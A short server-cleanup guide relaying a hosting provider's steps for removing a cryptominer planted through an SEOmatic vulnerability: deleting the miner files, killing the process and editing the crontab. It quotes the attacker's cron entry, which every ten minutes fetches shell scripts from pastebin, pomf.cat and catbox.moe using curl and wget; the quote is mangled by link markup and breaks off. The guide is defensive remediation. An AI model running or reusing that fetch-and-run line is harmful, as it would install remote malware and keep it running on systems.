The following is an outline of the steps provided by Nevin Lyne from Arcustech to fix a server that's been compromised by the SEOmatic security vulnerability. These instructions are specific to servers that were hacked to be used for crypto currency mining. YMMV.
cd /tmp/systemd-private-e6cc411e8b01426e9d739a74be0a1e12-systemd-timesyncd.service-tmNLjm/tmp
rm watohdog
rm config.json
ps ax | grep watohdog
kill -9 [process id]
readlink -f /proc/[process_id]/exe
crontab -e
):
*/10 * * * * (curl -fsSL [<https://pastebin.com/raw/sRj0Lc8C||wget>](<https://pastebin.com/raw/sRj0Lc8C%7C%7Cwget>) -q -O
[https://pastebin.com/raw/sRj0Lc8C||curl](<https://pastebin.com/raw/sRj0Lc8C%7C%7Ccurl>) -fsSL [<https://a.pomf.cat/rxxypc.sh||wget>](<https://a.pomf.cat/rxxypc.sh%7C%7Cwget>) -q -O -
[https://a.pomf.cat/rxxypc.sh||curl](<https://a.pomf.cat/rxxypc.sh%7C%7Ccurl>) -fsSLk [<https://files.catbox.moe/6uvjoq.sh||wget>](<https://files.catbox.moe/6uvjoq.sh%7C%7Cwget>) -q -O
<aside> <img src="https://s3-us-west-2.amazonaws.com/secure.notion-static.com/dc581e24-09c7-48dc-a950-c71be3f97c45/warning.svg" alt="https://s3-us-west-2.amazonaws.com/secure.notion-static.com/dc581e24-09c7-48dc-a950-c71be3f97c45/warning.svg" width="40px" /> It's worth noting that, so far, all signs are pointing to these steps effectively scrubbing the server of any nastiness that was installed. But the only way to be absolutely sure the server is clean and that your data and users are safe is to start fresh with a new server or restoring from a full system snapshot taken before the exploit happened.
</aside>